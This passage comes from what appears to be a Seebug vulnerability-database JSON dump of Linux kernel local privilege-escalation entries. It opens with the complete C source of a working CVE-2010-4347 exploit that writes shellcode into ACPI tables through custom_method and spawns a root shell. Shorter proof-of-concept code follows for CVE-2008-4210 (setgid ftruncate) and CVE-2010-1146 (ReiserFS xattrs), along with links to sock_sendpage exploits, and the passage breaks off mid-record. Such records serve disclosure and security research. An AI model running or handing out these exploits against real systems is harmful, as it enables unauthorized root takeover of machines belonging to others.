Oberheide <jon@oberheide.org>\r\n * http://jon.oberheide.org\r\n * \r\n * Information:\r\n *\r\n * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4347\r\n *\r\n * This custom_method file allows to inject custom ACPI methods into the ACPI\r\n * interpreter tables. This control file was introduced with world writeable\r\n * permissions in Linux Kernel 2.6.33.\r\n *\r\n * Usage:\r\n * \r\n * $ gcc american-sign-language.c -o american-sign-language\r\n * $ ./american-sign-language\r\n * [+] resolving required symbols...\r\n * [+] checking for world-writable custom_method...\r\n * [+] checking for an ACPI LID device...\r\n * [+] poisoning ACPI tables via custom_method...\r\n * [+] triggering ACPI payload via LID device...\r\n * [+] triggering exploit via futimesat...\r\n * [+] launching root shell!\r\n * # id\r\n * uid=0(root) gid=0(root) groups=0(root)\r\n *\r\n * Notes:\r\n *\r\n * This vuln allows us to write custom ACPI methods and load them into the\r\n * kernel as an unprivileged user. We compile some fancy ASL down to AML \r\n * that overrides the ACPI method used when the status of the LID device is \r\n * queried (eg. 'open' or 'closed' lid on a laptop). When the method is \r\n * triggered, it overlays an OperationRegion on the physical address where \r\n * sys_futimesat is located and overwrites the memory via the Store to \r\n * escalate privileges whenever sys_futimesat is called.\r\n *\r\n * The payload is 64-bit only and depends on the existence of a LID device\r\n * (eg. laptop), but the exploit will still tell you if you're vulnerable\r\n * regardless. If you don't know how to work around these limitations, you \r\n * probably shouldn't be running this in the first place. :-P\r\n *\r\n * Props to taviso, spender, kees, bliss, pipacs, twiz, stealth, and #brownpants\r\n */\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <stdint.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <errno.h>\r\n#include <fcntl.h>\r\n#include <limits.h>\r\n#include <inttypes.h>\r\n#include <sys/types.h>\r\n#include <sys/stat.h>\r\n#include <sys/utsname.h>\r\n\r\n/*\r\n * The ASL payload looks like:\r\n *\r\n * DefinitionBlock ("lid.aml", "SSDT", 2, "", "", 0x00001001) {\r\n * Method (\\_SB.LID._LID, 0, NotSerialized) {\r\n * OperationRegion (KMEM, SystemMemory, PHYADDR, 0x392)\r\n * Field(KMEM, AnyAcc, NoLock, Preserve) {\r\n * HACK, 0x392\r\n * }\r\n * Store (Buffer () {\r\n * 0x55, 0x48, 0x89, 0xe5, 0x53, 0x48, 0x83, 0xec,\r\n * 0x08, 0x48, 0xc7, 0xc3, 0x24, 0x24, 0x24, 0x24,\r\n * 0x48, 0xc7, 0xc0, 0x24, 0x24, 0x24, 0x24, 0xbf,\r\n * 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89,\r\n * 0xc7, 0xff, 0xd3, 0x48, 0xc7, 0xc0, 0xb7, 0xff,\r\n * 0xff, 0xff, 0x48, 0x83, 0xc4, 0x08, 0x5b, 0xc9,\r\n * 0xc3 }, HACK)\r\n * Return (One)\r\n * }\r\n * }\r\n * \r\n * Feel free to `iasl -d` this is you don't trust me! ;-)\r\n */\r\n#define PAYLOAD_AML \\\r\n"\\x53\\x53\\x44\\x54\\x90\\x00\\x00\\x00\\x02\\x3e\\x00\\x00\\x00\\x00\\x00\\x00" \\\r\n"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x10\\x00\\x00\\x49\\x4e\\x54\\x4c" \\\r\n"\\x21\\x05\\x09\\x20\\x14\\x4b\\x06\\x5c\\x2f\\x03\\x5f\\x53\\x42\\x5f\\x4c\\x49" \\\r\n"\\x44\\x5f\\x5f\\x4c\\x49\\x44\\x00\\x5b\\x80\\x4b\\x4d\\x45\\x4d\\x00\\x0c\\xe0" \\\r\n"\\x61\\x17\\x01\\x0b\\x92\\x03\\x5b\\x81\\x0c\\x4b\\x4d\\x45\\x4d\\x00\\x48\\x41" \\\r\n"\\x43\\x4b\\x42\\x39\\x70\\x11\\x34\\x0a\\x31\\x55\\x48\\x89\\xe5\\x53\\x48\\x83" \\\r\n"\\xec\\x08\\x48\\xc7\\xc3\\x24\\x24\\x24\\x24\\x48\\xc7\\xc0\\x24\\x24\\x24\\x24" \\\r\n"\\xbf\\x00\\x00\\x00\\x00\\xff\\xd0\\x48\\x89\\xc7\\xff\\xd3\\x48\\xc7\\xc0\\xb7" \\\r\n"\\xff\\xff\\xff\\x48\\x83\\xc4\\x08\\x5b\\xc9\\xc3\\x48\\x41\\x43\\x4b\\xa4\\x01"\r\n#define PAYLOAD_LEN 144\r\n\r\n#define CUSTOM_METHOD "/sys/kernel/debug/acpi/custom_method"\r\n#define HEY_ITS_A_LID "/proc/acpi/button/lid/LID/state"\r\n\r\nunsigned long\r\nget_symbol(char *name)\r\n{\r\n\tFILE *f;\r\n\tunsigned long addr;\r\n\tchar dummy;\r\n\tchar sname[512];\r\n\tstruct utsname ver;\r\n\tint ret;\r\n\tint rep = 0;\r\n\tint oldstyle = 0;\r\n \r\n\tf = fopen("/proc/kallsyms", "r");\r\n\tif (f == NULL) {\r\n\t\tf = fopen("/proc/ksyms", "r");\r\n\t\tif (f == NULL)\r\n\t\t\tgoto fallback;\r\n\t\toldstyle = 1;\r\n\t}\r\n \r\nrepeat:\r\n\tret = 0;\r\n\twhile(ret != EOF) {\r\n\t\tif (!oldstyle)\r\n\t\t\tret = fscanf(f, "%p %c %s\\n", (void **)&addr, &dummy, sname);\r\n\t\telse {\r\n\t\t\tret = fscanf(f, "%p %s\\n", (void **)&addr, sname);\r\n\t\t\tif (ret == 2) {\r\n\t\t\t\tchar *p;\r\n\t\t\t\tif (strstr(sname, "_O/") || strstr(sname, "_S."))\r\n\t\t\t\t\tcontinue;\r\n\t\t\t\tp = strrchr(sname, '_');\r\n\t\t\t\tif (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {\r\n\t\t\t\t\tp = p - 4;\r\n\t\t\t\t\twhile (p > (char *)sname && *(p - 1) == '_')\r\n\t\t\t\t\t\tp--;\r\n\t\t\t\t\t*p = '\\0';\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t\tif (ret == 0) {\r\n\t\t\tfscanf(f, "%s\\n", sname);\r\n\t\t\tcontinue;\r\n\t\t}\r\n\t\tif (!strcmp(name, sname)) {\r\n\t\t\tfclose(f);\r\n\t\t\treturn addr;\r\n\t\t}\r\n\t}\r\n \r\n\tfclose(f);\r\n\tif (rep)\r\n\t\treturn 0;\r\nfallback:\r\n\tuname(&ver);\r\n\tif (strncmp(ver.release, "2.6", 3))\r\n\t\toldstyle = 1;\r\n\tsprintf(sname, "/boot/System.map-%s", ver.release);\r\n\tf = fopen(sname, "r");\r\n\tif (f == NULL)\r\n\t\treturn 0;\r\n\trep = 1;\r\n\tgoto repeat;\r\n}\r\n\r\nint\r\nmain(int argc, char **argv)\r\n{\r\n\tint ret;\r\n\tFILE *fp;\r\n\tchar buf[64];\r\n\tstruct stat sb;\r\n\tchar payload[PAYLOAD_LEN] = PAYLOAD_AML;\r\n\tunsigned long sys_futimesat, prepare_kernel_cred, commit_creds;\r\n\r\n\tprintf("[+] resolving required symbols...\\n");\r\n\r\n\tsys_futimesat = get_symbol("sys_futimesat");\r\n\tif (!sys_futimesat) {\r\n\t\tprintf("[-] sys_futimesat symbol not found, aborting!\\n");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tprepare_kernel_cred = get_symbol("prepare_kernel_cred");\r\n\tif (!prepare_kernel_cred) {\r\n\t\tprintf("[-] prepare_kernel_cred symbol not found, aborting!\\n");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tcommit_creds = get_symbol("commit_creds");\r\n\tif (!commit_creds) {\r\n\t\tprintf("[-] commit_creds symbol not found, aborting!\\n");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tprintf("[+] checking for world-writable custom_method...\\n");\r\n\r\n\tret = stat(CUSTOM_METHOD, &sb);\r\n\tif (ret < 0) {\r\n\t\tprintf("[-] custom_method not found, kernel is not vulnerable!\\n");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tif (!(sb.st_mode & S_IWOTH)) {\r\n\t\tprintf("[-] custom_method not world-writable, kernel is not vulnerable!\\n");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tprintf("[+] checking for an ACPI LID device...\\n");\r\n\r\n\tret = stat(HEY_ITS_A_LID, &sb);\r\n\tif (ret < 0) {\r\n\t\tprintf("[-] ACPI LID device not found, but kernel is still vulnerable!\\n");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tif (sizeof(sys_futimesat) != 8) {\r\n\t\tprintf("[-] payload is 64-bit only, but kernel is still vulnerable!\\n");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tsys_futimesat &= ~0xffffffff80000000;\r\n\tmemcpy(&payload[63], &sys_futimesat, 4);\r\n\tmemcpy(&payload[101], &commit_creds, 4);\r\n\tmemcpy(&payload[108], &prepare_kernel_cred, 4);\r\n\r\n\tprintf("[+] poisoning ACPI tables via custom_method...\\n");\r\n\r\n\tfp = fopen(CUSTOM_METHOD, "w");\r\n\tfwrite(payload, 1, sizeof(payload), fp);\r\n\tfclose(fp);\r\n\r\n\tprintf("[+] triggering ACPI payload via LID device...\\n");\r\n\r\n\tfp = fopen(HEY_ITS_A_LID, "r");\r\n\tfread(&buf, 1, sizeof(buf), fp);\r\n\tfclose(fp);\r\n\r\n\tprintf("[+] triggering exploit via futimesat...\\n");\r\n\r\n\tret = futimesat(0, "/tmp", NULL);\r\n\r\n\tif (ret != -1 || errno != EDOTDOT) {\r\n\t\tprintf("[-] unexpected futimesat errno, exploit failed!\\n");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tif (getuid() != 0) {\r\n\t\tprintf("[-] privileges not escalated, exploit failed!\\n");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tprintf("[+] launching root shell!\\n");\r\n\texecl("/bin/sh", "/bin/sh", NULL);\r\n}\n ", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-70421"}, {"lastseen": "2017-11-19T21:27:29", "description": "BUGTRAQ ID: 31368\r\nCVE ID\uff1aCVE-2008-4210\r\nCNCVE ID\uff1aCNCVE-20084210\r\n\r\nLinux\u662f\u4e00\u6b3e\u5f00\u653e\u6e90\u4ee3\u7801\u7684\u64cd\u4f5c\u7cfb\u7edf\u3002\r\nLinux\u5185\u6838'truncate()'\u548c'ftruncate()'\u51fd\u6570\u5b58\u5728\u8bbe\u8ba1\u9519\u8bef\uff0c\u672c\u5730\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u6f0f\u6d1e\u63d0\u5347\u7279\u6743\u3002\r\n\u5f53\u5efa\u7acb\u6587\u4ef6\u65f6\uff0copen()/creat()\u5141\u8bb8\u901a\u8fc7\u6a21\u5f0f\u53c2\u6570\u8bbe\u7f6esetgid\u4f4d\uff0c\u7531\u4e8ebsdgroups mount\u9009\u9879\u6216\u5728setgid\u76ee\u5f55\u4e2d\u5efa\u7acb\u6587\u4ef6\uff0c\u7528\u6237\u4e0d\u5c5e\u4e8e\u65b0\u6587\u4ef6\u7684\u7ec4\u7684\u6210\u5458\u3002\u7528\u6237\u53ef\u4ee5\u4f7f\u7528ftruncate()\u548cmemory-mapped I/O\u4f7f\u65b0\u6587\u4ef6\u6210\u4e3a\u4efb\u610f\u4e24\u8fdb\u5236\uff0c\u83b7\u5f97\u6b64\u7ec4\u7684\u7279\u6743\uff0c\u539f\u56e0\u662f\u8fd9\u4e9b\u64cd\u4f5c\u6ca1\u6709\u6e05\u9664setgid\u4f4d\u3002\r\n\n\nLinux kernel 2.6.21 4\r\nLinux kernel 2.6.21 .7\r\nLinux kernel 2.6.21 .6\r\nLinux kernel 2.6.21 .2\r\nLinux kernel 2.6.21 .1\r\nLinux kernel 2.6.21 \r\nLinux kernel 2.6.21 \r\nLinux kernel 2.6.21 \r\nLinux kernel 2.6.20 .9\r\nLinux kernel 2.6.20 .8\r\nLinux kernel 2.6.20 .5\r\nLinux kernel 2.6.20 .4\r\nLinux kernel 2.6.20 .15\r\nLinux kernel 2.6.20 \r\n+ Trustix Secure Enterprise Linux 2.0 \r\n+ Trustix Secure Linux 2.2 \r\n+ Trustix Secure Linux 2.1 \r\n+ Trustix Secure Linux 2.0 \r\nLinux kernel 2.6.20 \r\nLinux kernel 2.6.19 1\r\nLinux kernel 2.6.19 .2\r\nLinux kernel 2.6.19 .1\r\nLinux kernel 2.6.19 -rc4\r\n+ Trustix Secure Enterprise Linux 2.0 \r\n+ Trustix Secure Linux 2.2 \r\n+ Trustix Secure Linux 2.1 \r\n+ Trustix Secure Linux 2.0 \r\nLinux kernel 2.6.19 -rc3\r\n+ Trustix Secure Enterprise Linux 2.0 \r\n+ Trustix Secure Linux 2.2 \r\n+ Trustix Secure Linux 2.1 \r\n+ Trustix Secure Linux 2.0 \r\nLinux kernel 2.6.19 -rc2\r\n+ Trustix Secure Enterprise Linux 2.0 \r\n+ Trustix Secure Linux 2.2 \r\n+ Trustix Secure Linux 2.1 \r\n+ Trustix Secure Linux 2.0 \r\nLinux kernel 2.6.19 -rc1\r\nLinux kernel 2.6.19 \r\n+ Trustix Secure Enterprise Linux 2.0 \r\n+ Trustix Secure Linux 2.2 \r\n+ Trustix Secure Linux 2.1 \r\n+ Trustix Secure Linux 2.0 \r\nLinux kernel 2.6.18 .4\r\nLinux kernel 2.6.18 .3\r\nLinux kernel 2.6.18 .1\r\nLinux kernel 2.6.18 \r\n+ Debian Linux 4.0 sparc\r\n+ Debian Linux 4.0 s/390\r\n+ Debian Linux 4.0 powerpc\r\n+ Debian Linux 4.0 mipsel\r\n+ Debian Linux 4.0 mips\r\n+ Debian Linux 4.0 m68k\r\n+ Debian Linux 4.0 ia-64\r\n+ Debian Linux 4.0 ia-32\r\n+ Debian Linux 4.0 hppa\r\n+ Debian Linux 4.0 arm\r\n+ Debian Linux 4.0 amd64\r\n+ Debian Linux 4.0 alpha\r\n+ Debian Linux 4.0\r\n+ Trustix Secure Enterprise Linux 2.0 \r\n+ Trustix Secure Enterprise Linux 2.0 \r\n+ Trustix Secure Linux 2.2 \r\n+ Trustix Secure Linux 2.2 \r\n+ Trustix Secure Linux 2.1 \r\n+ Trustix Secure Linux 2.1 \r\n+ Trustix Secure Linux 2.0 \r\n+ Trustix Secure Linux 2.0 \r\nLinux kernel 2.6.17 .8\r\nLinux kernel 2.6.17 .7\r\nLinux kernel 2.6.17 .6\r\nLinux kernel 2.6.17 .5\r\nLinux kernel 2.6.17 .3\r\nLinux kernel 2.6.17 .2\r\nLinux kernel 2.6.17 .14\r\nLinux kernel 2.6.17 .13\r\nLinux kernel 2.6.17 .12\r\nLinux kernel 2.6.17 .11\r\nLinux kernel 2.6.17 .10\r\nLinux kernel 2.6.17 .1\r\nLinux kernel 2.6.17 -rc5\r\nLinux kernel 2.6.17 \r\nLinux kernel 2.6.17 \r\nLinux kernel 2.6.17 \r\nLinux kernel 2.6.17 \r\nLinux kernel 2.6.17 \r\nLinux kernel 2.6.17 \r\nLinux kernel 2.6.16 27\r\nLinux kernel 2.6.16 13\r\nLinux kernel 2.6.16 .9\r\nLinux kernel 2.6.16 .7\r\n+ Trustix Secure Enterprise Linux 2.0 \r\n+ Trustix Secure Linux 2.2 \r\n+ Trustix Secure Linux 2.1 \r\n+ Trustix Secure Linux 2.0 \r\nLinux kernel 2.6.16 .23\r\nLinux kernel 2.6.16 .19\r\nLinux kernel 2.6.16 .12\r\nLinux kernel 2.6.16 .11\r\nLinux kernel 2.6.16 .1\r\nLinux kernel 2.6.16 -rc1\r\nLinux kernel 2.6.16 \r\nLinux kernel 2.6.16 \r\nLinux kernel 2.6.16 \r\nLinux kernel 2.6.16 \r\nLinux kernel 2.6.16 \r\nLinux kernel 2.6.16 \r\nLinux kernel 2.6.16 \r\nLinux kernel 2.6.16 \r\nLinux kernel 2.6.16 \r\nLinux kernel 2.6.16 \r\nLinux kernel 2.6.16 \r\nLinux kernel 2.6.15 .4\r\nLinux kernel 2.6.15 .3\r\nLinux kernel 2.6.15 .2\r\nLinux kernel 2.6.15 .1\r\nLinux kernel 2.6.15 -rc3\r\nLinux kernel 2.6.15 -rc2\r\nLinux kernel 2.6.15 -rc1\r\nLinux kernel 2.6.15 \r\nLinux kernel 2.6.15 \r\nLinux kernel 2.6.15 \r\nLinux kernel 2.6.15 \r\nLinux kernel 2.6.15 \r\nLinux kernel 2.6.15 \r\n+ Trustix Secure Enterprise Linux 2.0 \r\n+ Trustix Secure Linux 2.2 \r\n+ Trustix Secure Linux 2.1 \r\n+ Trustix Secure Linux 2.0 \r\nLinux kernel 2.6.14 .5\r\nLinux kernel 2.6.14 .4\r\nLinux kernel 2.6.14 .3\r\nLinux kernel 2.6.14 .2\r\nLinux kernel 2.6.14 .1\r\nLinux kernel 2.6.14 -rc4\r\nLinux kernel 2.6.14 -rc3\r\nLinux kernel 2.6.14 -rc2\r\nLinux kernel 2.6.14 -rc1\r\nLinux kernel 2.6.14 \r\nLinux kernel 2.6.14 \r\n+ Trustix Secure Enterprise Linux 2.0 \r\n+ Trustix Secure Linux 2.2 \r\n+ Trustix Secure Linux 2.1 \r\n+ Trustix Secure Linux 2.0 \r\nLinux kernel 2.6.13 .4\r\nLinux kernel 2.6.13 .3\r\nLinux kernel 2.6.13 .2\r\nLinux kernel 2.6.13 .1\r\nLinux kernel 2.6.13 -rc7\r\nLinux kernel 2.6.13 -rc6\r\nLinux kernel 2.6.13 -rc4\r\nLinux kernel 2.6.13 -rc1\r\nLinux kernel 2.6.13 \r\nLinux kernel 2.6.13 \r\n+ Trustix Secure Enterprise Linux 2.0 \r\n+ Trustix Secure Linux 2.2 \r\n+ Trustix Secure Linux 2.1 \r\n+ Trustix Secure Linux 2.0 \r\nLinux kernel 2.6.12 .6\r\nLinux kernel 2.6.12 .5\r\nLinux kernel 2.6.12 .4\r\nLinux kernel 2.6.12 .3\r\nLinux kernel 2.6.12 .22\r\nLinux kernel 2.6.12 .2\r\nLinux kernel 2.6.12 .12\r\nLinux kernel 2.6.12 .1\r\nLinux kernel 2.6.12 -rc5\r\nLinux kernel 2.6.12 -rc4\r\nLinux kernel 2.6.12 -rc1\r\nLinux kernel 2.6.12 \r\nLinux kernel 2.6.12 \r\nLinux kernel 2.6.11 .8\r\nLinux kernel 2.6.11 .7\r\nLinux kernel 2.6.11 .6\r\nLinux kernel 2.6.11 .5\r\nLinux kernel 2.6.11 .4\r\nLinux kernel 2.6.11 .12\r\nLinux kernel 2.6.11 .11\r\nLinux kernel 2.6.11 -rc4\r\nLinux kernel 2.6.11 -rc3\r\nLinux kernel 2.6.11 -rc2\r\nLinux kernel 2.6.11 \r\nLinux kernel 2.6.11 \r\nLinux kernel 2.6.10 rc2\r\nLinux kernel 2.6.10 \r\nLinux kernel 2.6.10 \r\n+ Trustix Secure Enterprise Linux 2.0 \r\n+ Trustix Secure Linux 2.2 \r\n+ Trustix Secure Linux 2.1 \r\n+ Trustix Secure Linux 2.0 \r\nLinux kernel 2.6.2 \r\nLinux kernel 2.6.1 -rc2\r\nLinux kernel 2.6.1 -rc1\r\nLinux kernel 2.6.1 \r\nLinux kernel 2.6 .10\r\nLinux kernel 2.6 -test9-CVS\r\nLinux kernel 2.6 -test9\r\nLinux kernel 2.6 -test8\r\nLinux kernel 2.6 -test7\r\nLinux kernel 2.6 -test6\r\nLinux kernel 2.6 -test5\r\nLinux kernel 2.6 -test4\r\nLinux kernel 2.6 -test3\r\nLinux kernel 2.6 -test2\r\nLinux kernel 2.6 -test11\r\nLinux kernel 2.6 -test10\r\nLinux kernel 2.6 -test1\r\nLinux kernel 2.6 \r\nLinux kernel 2.6.21-RC6\r\nLinux kernel 2.6.21-RC5\r\nLinux kernel 2.6.21-RC4\r\nLinux kernel 2.6.21-RC3\r\nLinux kernel 2.6.21-RC3\r\nLinux kernel 2.6.20.3\r\nLinux kernel 2.6.20.2\r\nLinux kernel 2.6.20.13\r\nLinux kernel 2.6.20.11\r\nLinux kernel 2.6.20.1\r\nLinux kernel 2.6.20-rc2\r\nLinux kernel 2.6.20-2\r\nLinux kernel 2.6.18-8.1.8.el5\r\nLinux kernel 2.6.18-53\r\nLinux kernel 2.6.18\r\nLinux kernel 2.6.15.5\r\nLinux kernel 2.6.15.11\r\nLinux kernel 2.6.15-27.48\r\nLinux kernel 2.6.11.4\r\n\n \u53ef\u5347\u7ea7\u5230\u6700\u65b0\u7684Linux\u5185\u6838\uff1a\r\n<a href=http://www.linux.org/ target=_blank>http://www.linux.org/</a>", "cvss3": {}, "published": "2008-09-27T00:00:00", "type": "seebug", "title": "Linux Kernel 'truncate()'\u672c\u5730\u7279\u6743\u63d0\u5347\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2008-4210"], "modified": "2008-09-27T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-4118", "id": "SSV:4118", "sourceData": "\n #!/usr/bin/env python\r\nimport os\r\nimport mmap\r\nbin = file("/usr/bin/id").read()\r\nfd = os.open("id", os.O_RDWR | os.O_CREAT | os.O_EXCL, 02750)\r\nos.ftruncate(fd, len(bin))\r\nm = mmap.mmap(fd, len(bin))\r\nm[:] = bin\r\nm.flush()\r\n \r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-4118", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T18:13:29", "description": "BUGTRAQ ID: 39344\r\nCVE ID: CVE-2010-1146\r\n\r\nLinux Kernel\u662f\u5f00\u653e\u6e90\u7801\u64cd\u4f5c\u7cfb\u7edfLinux\u6240\u4f7f\u7528\u7684\u5185\u6838\u3002\r\n\r\nLinux Kernel\u7684ReiserFS\u6587\u4ef6\u7cfb\u7edf\u5b9e\u73b0\u6ca1\u6709\u6b63\u786e\u5730\u9650\u5236\u5bf9.reiserfs_priv\u76ee\u5f55\u7684\u8bbf\u95ee\uff0c\u672c\u5730\u7528\u6237\u53ef\u4ee5\u901a\u8fc7\u4fee\u6539ACL\u6216\u6269\u5c55\u5c5e\u6027\u83b7\u5f97 root\u6743\u9650\u63d0\u5347\u3002\u6210\u529f\u653b\u51fb\u8981\u6c42\u7cfb\u7edf\u6b63\u5728\u4f7f\u7528ReiserFS\u6587\u4ef6\u7cfb\u7edf\u3002\n\nLinux kernel 2.6.x\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nLinux\r\n-----\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=blob;f=fs/reiserfs/xattr.c;h=81f09fab8ae476ccbdb9547d226e397e1b8cb6d1;hb=HEAD", "cvss3": {}, "published": "2010-04-12T00:00:00", "title": "Linux Kernel ReiserFS\u6587\u4ef6\u7cfb\u7edf\u5b9e\u73b0\u7ed5\u8fc7\u5b89\u5168\u9650\u5236\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-1146"], "modified": "2010-04-12T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-19436", "id": "SSV:19436", "sourceData": "\n \u4ee5root\uff1a\r\ntruncate --size 64M test.reiserfs\r\nmkreiserfs -f test.reiserfs\r\nmkdir /mnt/test\r\nmount -o loop,rw,user_xattr test.reiserfs /mnt/test\r\nsetfattr -n user.test -v myvalue /mnt/test\r\n\r\n\u4ee5\u666e\u901a\u7528\u6237\uff1a\r\nls -l /mnt/test/.reiserfs_priv/xattrs/2.0\r\nrm /mnt/test/.reiserfs_priv/xattrs/2.0/user.test # Whoops\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-19436", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T21:46:54", "description": "BUGTRAQ ID: 27799\r\nCVE(CAN) ID: CVE-2008-0009\r\n\r\nLinux Kernel\u662f\u5f00\u653e\u6e90\u7801\u64cd\u4f5c\u7cfb\u7edfLinux\u6240\u4f7f\u7528\u7684\u5185\u6838\u3002\r\n\r\nLinux Kernel\u7684\u5b9e\u73b0\u4e0a\u5b58\u5728\u6f0f\u6d1e\uff0c\u672c\u5730\u653b\u51fb\u8005\u53ef\u80fd\u5229\u7528\u6b64\u6f0f\u6d1e\u63d0\u5347\u81ea\u5df1\u7684\u6743\u9650\u3002\r\n\r\nLinux Kernel\u7684fs/splice.c\u6587\u4ef6\u4e2d\u7684vmsplice_to_user()\u51fd\u6570\u9519\u8bef\u5730\u5f15\u7528\u4e86\u7528\u6237\u63d0\u4f9b\u7684\u5185\u5b58\u6307\u9488:\r\n\r\n---8<--- fs/splice.c:1378 ---8<---\r\n error = get_user(base, &iov->iov_base);\r\n /* ... */\r\n if (unlikely(!base)) {\r\n error = -EFAULT;\r\n break;\r\n }\r\n /* ... */\r\n sd.u.userptr = base;\r\n /* ... */\r\n size = __splice_from_pipe(pipe, &sd, pipe_to_user);\r\n---8<--- fs/splice.c:1401 ---8<---\r\n\r\n\u8fd9\u6bb5\u4ee3\u7801\u6ca1\u6709\u9a8c\u8bc1\u8fd9\u4e9b\u6307\u9488\u3002__splice_from_pipe()\u5047\u8bbe\u8fd9\u4e9b\u6307\u9488\u4e3a\u6709\u6548\u7684\u7528\u6237\u5185\u5b58\u6307\u9488\uff0c\u6ca1\u6709\u6267\u884c\u4efb\u4f55\u9a8c\u8bc1\u3002\u51fd\u6570\u7528pipe_to_user()\u4e2d\u7684__copy_to_user_inatomic()\u51fd\u6570\u5f15\u7528\u4e86\u6307\u9488\uff0c\u4ee5\u4fbf\u5c06\u6570\u636e\u5199\u5165\u7528\u6237\u8fdb\u7a0b\u5185\u5b58\uff0c\u5bfc\u81f4\u53ef\u80fd\u5c06\u4ece\u7ba1\u9053\u8bfb\u53d6\u7684\u4efb\u610f\u6570\u636e\u5199\u5165\u5230\u5185\u6838\u5185\u5b58\u3002\u672c\u5730\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7\u7279\u5236\u7684vmsplice()\u7cfb\u7edf\u8c03\u7528\u5bfc\u81f4\u83b7\u5f97root\u7528\u6237\u6743\u9650\u3002\r\n\n\nLinux kernel 2.6.22 - 2.6.24\n \u5382\u5546\u8865\u4e01\uff1a\r\n\r\nLinux\r\n-----\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\n<a href=http://www.kernel.org/pub/linux/kernel/v2.6/patch-2.6.24.1.bz2 target=_blank>http://www.kernel.org/pub/linux/kernel/v2.6/patch-2.6.24.1.bz2</a>", "cvss3": {}, "published": "2008-02-22T00:00:00", "title": "Linux Kernel vmsplice_to_user()\u51fd\u6570\u672c\u5730\u6743\u9650\u63d0\u5347\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2008-0009"], "modified": "2008-02-22T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-2921", "id": "SSV:2921", "sourceData": "\n http://www.sebug.net/exploit/3128\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-2921", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T21:19:19", "description": "No description provided by source.", "cvss3": {}, "published": "2009-08-19T00:00:00", "title": "Linux Kernel 2.x sock_sendpage() Local Root Exploit (Android Edition)", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2009-2692"], "modified": "2009-08-19T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-12073", "id": "SSV:12073", "sourceData": "\n Source for exploiting CVE-2009-2692 on Android; Hole is closed in Android kernels released August 2009 or later.\r\n\r\norig: http://zenthought.org/content/file/android-root-2009-08-16-source\r\nback: http://milw0rm.com/sploits/android-root-20090816.tar.gz\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-12073", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T18:39:22", "description": "No description provided by source.", "cvss3": {}, "published": "2009-08-25T00:00:00", "title": "Linux Kernel 2.4/2.6 sock_sendpage() ring0 Root Exploit (simple ver)", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2009-2692"], "modified": "2009-08-25T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-12103", "id": "SSV:12103", "sourceData": "\n /*\r\n**\r\n** 0x82-CVE-2009-2692\r\n** Linux kernel 2.4/2.6 (32bit) sock_sendpage() local ring0 root exploit (simple ver)\r\n** Tested RedHat Linux 9.0, Fedora core 4~11, Whitebox 4, CentOS 4.x.\r\n**\r\n** --\r\n** Discovered by Tavis Ormandy and Julien Tinnes of the Google Security Team.\r\n** spender and venglin's code is very excellent.\r\n** Thankful to them.\r\n**\r\n** Greets: Brad Spengler <spender(at)grsecurity(dot)net>,\r\n** Przemyslaw 